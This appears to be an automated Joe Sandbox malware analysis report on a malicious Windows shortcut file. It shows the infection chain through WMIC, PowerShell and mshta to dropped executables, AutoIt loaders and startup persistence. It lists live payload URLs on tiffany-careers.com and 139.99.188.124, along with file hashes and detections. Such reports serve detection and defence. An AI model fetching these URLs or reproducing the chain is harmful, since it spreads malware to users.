Cached Domain Credentials31
Virtualization/Sandbox Evasion
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
Valid Accounts
DCSync13
Process Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
Virtualization/Sandbox Evasion
Proc Filesystem11
Application Window Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
Access Token Manipulation
/etc/passwd and /etc/shadow1
System Owner/User Discovery
Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
Process Injection
Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579758 Sample: 7A2lfjTYNf.lnk Startdate: 23/12/2024 Architecture: WINDOWS Score: 100 90 x1.i.lencr.org 2->90 92 tiffany-careers.com 2->92 94 nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs 2->94 102 Suricata IDS alerts for network traffic 2->102 104 Windows shortcut file (LNK) starts blacklisted processes 2->104 106 Multi AV Scanner detection for submitted file 2->106 108 14 other signatures 2->108 15 WMIC.exe 1 2->15         started        18 wscript.exe 2->18         started        20 svchost.exe 1 1 2->20         started        signatures3 process4 dnsIp5 134 Contains functionality to create processes via WMI 15->134 136 Creates processes via WMI 15->136 23 powershell.exe 7 15->23         started        26 conhost.exe 1 15->26         started        138 Windows Scripting host queries suspicious COM object (likely to drop second stage) 18->138 28 SwiftWrite.pif 18->28         started        98 127.0.0.1 unknown unknown 20->98 signatures6 process7 signatures8 114 Windows shortcut file (LNK) starts blacklisted processes 23->114 116 Drops PE files to the user root directory 23->116 118 Powershell drops PE file 23->118 30 powershell.exe 7 23->30         started        33 conhost.exe 23->33         started        process9 signatures10 132 Windows shortcut file (LNK) starts blacklisted processes 30->132 35 mshta.exe 16 30->35         started        process11 dnsIp12 96 tiffany-careers.com 147.45.49.155, 443, 49719, 49734 FREE-NET-ASFREEnetEU Russian Federation 35->96 78 C:\Users\user\AppData\...\ghepduy1325[1], PE32 35->78 dropped 110 Windows shortcut file (LNK) starts blacklisted processes 35->110 112 Suspicious powershell command line found 35->112 40 powershell.exe 17 19 35->40         started        file13 signatures14 process15 file16 82 C:\Users\user\AppData\Roaming\dqcwif.exe, PE32+ 40->82 dropped 43 dqcwif.exe 40->43         started        47 Acrobat.exe 78 40->47         started        49 conhost.exe 40->49         started        process17 file18 84 C:\Users\Public\PublicProfile.ps1, ASCII 43->84 dropped 120 Windows shortcut file (LNK) starts blacklisted processes 43->120 122 Multi AV Scanner detection for dropped file 43->122 124 Suspicious powershell command line found 43->124 126 2 other signatures 43->126 51 powershell.exe 43->51         started        54 powershell.exe 43->54         started        57 AcroCEF.exe 106 47->57         started        signatures19 process20 dnsIp21 74 C:\Users\Public\Secure.au3, Unicode 51->74 dropped 59 Guard.exe 51->59         started        63 conhost.exe 51->63         started        100 139.99.188.124, 49783, 49800, 80 OVHFR Canada 54->100 76 C:\Users\Publicbehaviorgraphuard.exe, PE32 54->76 dropped 65 conhost.exe 54->65         started        67 AcroCEF.exe 57->67         started        file22 process23 file24 86 C:\Users\user\AppData\...\SwiftWrite.pif, PE32 59->86 dropped 88 C:\Users\user\AppData\Local\...\SwiftWrite.js, ASCII 59->88 dropped 128 Windows shortcut file (LNK) starts blacklisted processes 59->128 130 Drops PE files with a suspicious file extension 59->130 69 cmd.exe 59->69         started        signatures25 process26 file27 80 C:\Users\user\AppData\...\SwiftWrite.url, MS 69->80 dropped 72 conhost.exe 69->72         started        process28

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
7A2lfjTYNf.lnk26%VirustotalBrowse
7A2lfjTYNf.lnk21%ReversingLabsWin32.Trojan.Pantera
SourceDetectionScannerLabelLink
C:\Users\Public\Guard.exe8%ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\ghepduy1325[1]11%ReversingLabsWin32.Dropper.Lumma
C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif8%ReversingLabs
C:\Users\user\AppData\Roaming\dqcwif.exe65%ReversingLabsWin64.Adware.RedCap
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
tiffany-careers.com
147.45.49.155
truefalse
    high
    x1.i.lencr.org
    unknown
    unknownfalse
      high
      nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs
      unknown
      unknownfalse
        high
        NameMaliciousAntivirus DetectionReputation
        https://tiffany-careers.com/Job_Description.pdftrue
          unknown
          https://tiffany-careers.com/dqcwif.exetrue
            unknown
            http://139.99.188.124/IAFkhtrue
              unknown
              https://tiffany-careers.com/ghepduy1325true
                unknown
                http://139.99.188.124/VmnWBYrzn.txttrue
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.autoitscript.com/autoit3/JGuard.exe, 0000001C.00000000.2484845641.00000000006B9000.00000002.00000001.01000000.00000010.sdmp, Guard.exe, 0000001C.00000003.2506926999.0000000004A28000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif, 00000021.00000000.2641644438.0000000000E59000.00000002.00000001.01000000.00000011.sdmp, SwiftWrite.pif.28.dr, Guard.exe.20.drfalse
                    high
                    http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.17.drfalse
                      high
                      https://tiffany-careers.com/ghepduy1325$global:?powershell.exefalse
                        unknown
                        https://tiffany-careers.cpowershell.exe, 00000009.00000002.2387052850.000001F2CE6BE000.00000004.00000800.00020000.00000000.sdmptrue
                          unknown
                          https://tiffany-careers.compowershell.exe, 00000009.00000002.2387052850.000001F2CE6BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2387052850.000001F2C94BB000.00000004.00000800.00020000.00000000.sdmptrue
                            unknown
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000009.00000002.2387052850.000001F2C94BB000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://tiffany-careers.com/dqcwif.epowershell.exe, 00000009.00000002.2387052850.000001F2CE6BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                unknown
                                https://tiffany-careers.com/dqpowershell.exe, 00000009.00000002.2387052850.000001F2CE6BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000009.00000002.2387052850.000001F2C94BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://go.micropowershell.exe, 00000018.00000002.2503038177.000002035DF12000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://tiffany-careers.com/powershell.exe, 00000009.00000002.2387052850.000001F2CE6BE000.00000004.00000800.00020000.00000000.sdmptrue
                                        unknown
                                        https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 00000008.00000003.2204354185.000001B4F1990000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://tiffany-careers.com/ghepduy1325;.JSE;.WSF;.WSjpowershell.exe, 00000005.00000002.2176390599.0000023772570000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            https://tiffany-careers.com/dqcwif.powershell.exe, 00000009.00000002.2387052850.000001F2CE6BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                              unknown
                                              https://tiffany-careers.com/dqcwifpowershell.exe, 00000009.00000002.2387052850.000001F2CE6BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                unknown
                                                https://tiffany-careers.com/dqcwif.expowershell.exe, 00000009.00000002.2387052850.000001F2CE6BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://www.autoitscript.com/autoit3/Guard.exe, 0000001C.00000003.2506926999.0000000004A28000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.28.dr, Guard.exe.20.drfalse
                                                    high
                                                    https://github.com/Pester/Pesterpowershell.exe, 00000009.00000002.2387052850.000001F2C94BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://tiffany-careers.com/ghepduy13256powershell.exe, 00000005.00000002.2175937945.0000023772365000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://tiffany-careers.com/ghepduy1325ppowershell.exe, 00000005.00000002.2174205142.0000023700001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://tiffany-careers.com/dqcwipowershell.exe, 00000009.00000002.2387052850.000001F2CE6BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://g.live.com/odclientsettings/Prod1C:qmgr.db.8.drfalse
                                                              high
                                                              http://139.99.188.124powershell.exe, 00000018.00000002.2503038177.000002035DA51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2503038177.000002035DFFE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://tiffany-careers.com/ghepduy1325hpowershell.exe, 00000005.00000002.2174205142.00000237004A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://tiffany-careers.copowershell.exe, 00000009.00000002.2387052850.000001F2CE6BE000.00000004.00000800.00020000.00000000.sdmptrue
                                                                    unknown
                                                                    https://aka.ms/pscore68powershell.exe, 00000005.00000002.2174205142.000002370004A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2174205142.000002370005D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2387052850.000001F2C9291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2503038177.000002035D821000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://139.99.Hpowershell.exe, 00000018.00000002.2503038177.000002035E2C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        http://139.99.188.124/IAFkhVdqcwif.exe, 00000013.00000002.2438580826.00000281D2B48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.2174205142.000002370001D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2387052850.000001F2C9291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2503038177.000002035D821000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://tiffany-careers.compowershell.exe, 00000009.00000002.2387052850.000001F2CE6BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://tiffany-careers.com/dqcwpowershell.exe, 00000009.00000002.2387052850.000001F2CE6BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://tiffany-careers.com/dqcpowershell.exe, 00000009.00000002.2387052850.000001F2CE6BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://tiffany-careers.com/dpowershell.exe, 00000009.00000002.2387052850.000001F2CE6BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs
                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    139.99.188.124
                                                                                    unknownCanada
                                                                                    16276OVHFRtrue
                                                                                    147.45.49.155
                                                                                    tiffany-careers.comRussian Federation
                                                                                    2895FREE-NET-ASFREEnetEUfalse
                                                                                    IP
                                                                                    127.0.0.1
                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                    Analysis ID:1579758
                                                                                    Start date and time:2024-12-23 08:38:19 +01:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 8m 34s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                    Number of analysed new started processes analysed:35
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:0
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Sample name:7A2lfjTYNf.lnk
                                                                                    renamed because original name is a hash value
                                                                                    Original Sample Name:767810929a7b0dddecaad84a15aed733.lnk
                                                                                    Detection:MAL
                                                                                    Classification:mal100.expl.evad.winLNK@43/61@8/3
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 33.3%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 97%
                                                                                    • Number of executed functions: 49
                                                                                    • Number of non-executed functions: 235
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .lnk
                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                                                                    • Excluded IPs from analysis (whitelisted): 23.218.208.109, 23.218.208.137, 172.64.41.3, 162.159.61.3, 3.219.243.226, 52.6.155.20, 52.22.41.97, 3.233.129.217, 23.195.39.65, 2.19.198.56, 2.19.198.48, 2.19.198.40, 2.19.198.65, 2.19.198.58, 23.32.238.155, 23.32.238.160, 2.19.198.66, 2.19.198.42, 2.19.198.49, 2.19.198.57, 23.32.238.161, 23.32.238.163, 2.22.50.131, 2.22.50.144, 23.32.238.88, 2.19.198.50, 2.19.198.73, 2.19.198.74, 2.19.198.75, 23.32.238.106, 23.32.238.97, 23.32.238.120, 23.32.238.115, 23.32.238.113, 23.32.238.96, 23.32.238.90, 23.32.238.122, 23.32.238.99, 23.32.238.123, 23.32.238.128, 23.32.238.105, 23.32.238.152, 23.32.238.147, 23.32.238.145, 23.32.238.146, 23.32.238.153, 23.32.238.154, 40.126.53.9, 20.223.35.26, 13.107.246.63, 2.16.158.179, 20.31.169.57, 150.171.27.10, 4.245.163.56, 23.47.168.24
                                                                                    • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, tse1.mm.bing.net, g.bing.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, acroipm2.adobe.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, login.live.com, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, www.bing.com, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, armmf.adobe.com, geo2.adobe.com
                                                                                    • Execution Graph export aborted for target powershell.exe, PID 6540 because it is empty
                                                                                    • Execution Graph export aborted for target powershell.exe, PID 8428 because it is empty
                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                    TimeTypeDescription
                                                                                    02:39:12API Interceptor1x Sleep call for process: WMIC.exe modified
                                                                                    02:39:18API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                    02:39:19API Interceptor1x Sleep call for process: mshta.exe modified
                                                                                    02:39:20API Interceptor122x Sleep call for process: powershell.exe modified
                                                                                    02:39:42API Interceptor1x Sleep call for process: AcroCEF.exe modified
                                                                                    02:40:25API Interceptor42x Sleep call for process: Guard.exe modified
                                                                                    08:39:52AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    139.99.188.1246fW0guYpsH.lnkGet hashmaliciousUnknownBrowse
                                                                                    • 139.99.188.124/QWCheljD.txt
                                                                                    R4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                                                                    • 139.99.188.124/QWCheljD.txt
                                                                                    R8CAg00Db8.lnkGet hashmaliciousUnknownBrowse
                                                                                    • 139.99.188.124/QWCheljD.txt
                                                                                    s4PymYGgSh.lnkGet hashmaliciousUnknownBrowse
                                                                                    • 139.99.188.124/EsgMle.txt
                                                                                    EO3RT0fEfb.exeGet hashmaliciousUnknownBrowse
                                                                                    • 139.99.188.124/ucZfzm.txt
                                                                                    RMBOriPHVJ.exeGet hashmaliciousUnknownBrowse
                                                                                    • 139.99.188.124/mzmLv.txt
                                                                                    S6x3K8vzCA.exeGet hashmaliciousUnknownBrowse
                                                                                    • 139.99.188.124/wPBPjuY.txt
                                                                                    PPbimZI4LV.exeGet hashmaliciousUnknownBrowse
                                                                                    • 139.99.188.124/BlQMSgJx.txt
                                                                                    l5VhEpwzJy.exeGet hashmaliciousUnknownBrowse
                                                                                    • 139.99.188.124/jiJNz.txt
                                                                                    duyba.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                    • 139.99.188.124/QWCheljD.txt
                                                                                    147.45.49.155R8CAg00Db8.lnkGet hashmaliciousUnknownBrowse
                                                                                    • tiffany-careers.com/PefjSkkhb.exe
                                                                                    s4PymYGgSh.lnkGet hashmaliciousUnknownBrowse
                                                                                    • tiffany-careers.com/BFmcYQ.exe
                                                                                    duyba.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                    • tiffany-careers.com/PefjSkkhb.exe
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    tiffany-careers.com6fW0guYpsH.lnkGet hashmaliciousUnknownBrowse
                                                                                    • 147.45.49.155
                                                                                    FzmtNV0vnG.lnkGet hashmaliciousUnknownBrowse
                                                                                    • 147.45.49.155
                                                                                    lKin1m7Pf2.lnkGet hashmaliciousUnknownBrowse
                                                                                    • 147.45.49.155
                                                                                    R4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                                                                    • 147.45.49.155
                                                                                    R8CAg00Db8.lnkGet hashmaliciousUnknownBrowse
                                                                                    • 147.45.49.155
                                                                                    s4PymYGgSh.lnkGet hashmaliciousUnknownBrowse
                                                                                    • 147.45.49.155
                                                                                    duyba.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                    • 147.45.49.155
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    FREE-NET-ASFREEnetEU6fW0guYpsH.lnkGet hashmaliciousUnknownBrowse
                                                                                    • 147.45.49.155
                                                                                    FzmtNV0vnG.lnkGet hashmaliciousUnknownBrowse
                                                                                    • 147.45.49.155
                                                                                    lKin1m7Pf2.lnkGet hashmaliciousUnknownBrowse
                                                                                    • 147.45.49.155
                                                                                    jqplot.htaGet hashmaliciousUnknownBrowse
                                                                                    • 147.45.112.248
                                                                                    KNkr78hyig.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                    • 147.45.113.159
                                                                                    Tsy9P2T9yF.exeGet hashmaliciousUnknownBrowse
                                                                                    • 147.45.113.159
                                                                                    kGxQbLOG7s.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                    • 147.45.113.159
                                                                                    q79Pocl81P.exeGet hashmaliciousCryptbotBrowse
                                                                                    • 147.45.113.159
                                                                                    fnuFOEqg4j.exeGet hashmaliciousUnknownBrowse
                                                                                    • 147.45.113.159
                                                                                    ob4eL9Z1O4.exeGet hashmaliciousCryptbotBrowse
                                                                                    • 147.45.113.159
                                                                                    OVHFR6fW0guYpsH.lnkGet hashmaliciousUnknownBrowse
                                                                                    • 139.99.188.124
                                                                                    x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 149.202.242.118
                                                                                    x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 23.92.237.128
                                                                                    Fatura227Pendente576.pdf674.msiGet hashmaliciousUnknownBrowse
                                                                                    • 91.134.82.79
                                                                                    nshkarm7.elfGet hashmaliciousMiraiBrowse
                                                                                    • 66.70.211.36
                                                                                    nsharm7.elfGet hashmaliciousMiraiBrowse
                                                                                    • 51.195.199.38
                                                                                    arm7.elfGet hashmaliciousMiraiBrowse
                                                                                    • 8.33.207.91
                                                                                    nshkarm5.elfGet hashmaliciousMiraiBrowse
                                                                                    • 51.161.159.84
                                                                                    NotaFiscalOnline.ClientSetup.ex#.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                    • 51.89.135.228
                                                                                    NotaFiscalOnline.ClientSetup.ex#.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                    • 51.89.135.228
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    3b5074b1b5d032e5620f69f9f700ff0e6fW0guYpsH.lnkGet hashmaliciousUnknownBrowse
                                                                                    • 147.45.49.155
                                                                                    FzmtNV0vnG.lnkGet hashmaliciousUnknownBrowse
                                                                                    • 147.45.49.155
                                                                                    lKin1m7Pf2.lnkGet hashmaliciousUnknownBrowse
                                                                                    • 147.45.49.155
                                                                                    uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                    • 147.45.49.155
                                                                                    DHL AWB-documents.lnkGet hashmaliciousDivulge StealerBrowse
                                                                                    • 147.45.49.155
                                                                                    Rokadernes.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                    • 147.45.49.155
                                                                                    tg.exeGet hashmaliciousBabadedaBrowse
                                                                                    • 147.45.49.155
                                                                                    tg.exeGet hashmaliciousBabadedaBrowse
                                                                                    • 147.45.49.155
                                                                                    setup.exeGet hashmaliciousBabadedaBrowse
                                                                                    • 147.45.49.155
                                                                                    Loader.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                    • 147.45.49.155
                                                                                    37f463bf4616ecd445d4a1937da06e196fW0guYpsH.lnkGet hashmaliciousUnknownBrowse
                                                                                    • 147.45.49.155
                                                                                    FzmtNV0vnG.lnkGet hashmaliciousUnknownBrowse
                                                                                    • 147.45.49.155
                                                                                    lKin1m7Pf2.lnkGet hashmaliciousUnknownBrowse
                                                                                    • 147.45.49.155
                                                                                    uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                    • 147.45.49.155
                                                                                    gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                    • 147.45.49.155
                                                                                    Rokadernes.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                    • 147.45.49.155
                                                                                    trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                    • 147.45.49.155
                                                                                    9EI7wrGs4K.exeGet hashmaliciousVidarBrowse
                                                                                    • 147.45.49.155
                                                                                    setup.msiGet hashmaliciousUnknownBrowse
                                                                                    • 147.45.49.155
                                                                                    Setup.exeGet hashmaliciousUnknownBrowse
                                                                                    • 147.45.49.155
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    C:\Users\Public\Guard.exe6fW0guYpsH.lnkGet hashmaliciousUnknownBrowse
                                                                                      FzmtNV0vnG.lnkGet hashmaliciousUnknownBrowse
                                                                                        lKin1m7Pf2.lnkGet hashmaliciousUnknownBrowse
                                                                                          R4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                                                                            R8CAg00Db8.lnkGet hashmaliciousUnknownBrowse
                                                                                              s4PymYGgSh.lnkGet hashmaliciousUnknownBrowse
                                                                                                PkContent.exeGet hashmaliciousUnknownBrowse
                                                                                                  PkContent.exeGet hashmaliciousUnknownBrowse
                                                                                                    ldqj18tn.exeGet hashmaliciousUnknownBrowse
                                                                                                      ldqj18tn.exeGet hashmaliciousUnknownBrowse
                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                        File Type:Extensible storage user DataBase, version 0x620, checksum 0x29d9fdea, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1310720
                                                                                                        Entropy (8bit):0.7556440215064401
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:NSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:NazaSvGJzYj2UlmOlOL
                                                                                                        MD5:1955C1C7238CEE5531B5653DF4E8CAFC
                                                                                                        SHA1:426AB55956610EB8C508AC875689016071EE9A1A
                                                                                                        SHA-256:FC2758E253A054FEFE5FEC7E18F4FA4E0059537DF18188155490E63829CE9A1F
                                                                                                        SHA-512:4CFA509349E4AD1C96A68403736F263AFC436A31C48F3D72CC73ADBD6832945BD8C5B1168260540AD72CA0A6D2206EDDF7DBB0F055F878849295D064E1401639
                                                                                                        Malicious:false
                                                                                                        Preview:)...... .......7.......X\...;...{......................0.e......!...{?..'...|..h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{..................................!H+..'...|...................sG..'...|...........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):893608
                                                                                                        Entropy (8bit):6.62028134425878
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                                                        MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                        SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                                                        SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                                                        SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                                                        Joe Sandbox View:
                                                                                                        • Filename: 6fW0guYpsH.lnk, Detection: malicious, Browse
                                                                                                        • Filename: FzmtNV0vnG.lnk, Detection: malicious, Browse
                                                                                                        • Filename: lKin1m7Pf2.lnk, Detection: malicious, Browse
                                                                                                        • Filename: R4qP4YM0QX.lnk, Detection: malicious, Browse
                                                                                                        • Filename: R8CAg00Db8.lnk, Detection: malicious, Browse
                                                                                                        • Filename: s4PymYGgSh.lnk, Detection: malicious, Browse
                                                                                                        • Filename: PkContent.exe, Detection: malicious, Browse
                                                                                                        • Filename: PkContent.exe, Detection: malicious, Browse
                                                                                                        • Filename: ldqj18tn.exe, Detection: malicious, Browse
                                                                                                        • Filename: ldqj18tn.exe, Detection: malicious, Browse
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Users\user\AppData\Roaming\dqcwif.exe
                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):487
                                                                                                        Entropy (8bit):5.281029316628711
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:f73/odXWFEoFnV/9LBzFj0zUQbnRS6SxJMnCPTFM:f73/3CknZ9LzjYnRSb8Cba
                                                                                                        MD5:C4D23FB0E6B7526C90C5D4C07B74DE71
                                                                                                        SHA1:B3BCABB9BDDC92CD98A6A1F3B477AD2103E3AEFE
                                                                                                        SHA-256:E03060B03452B9B20241EAC1BAA94C5D7B9E3A1E5A9FC5AB501B20546F1CB944
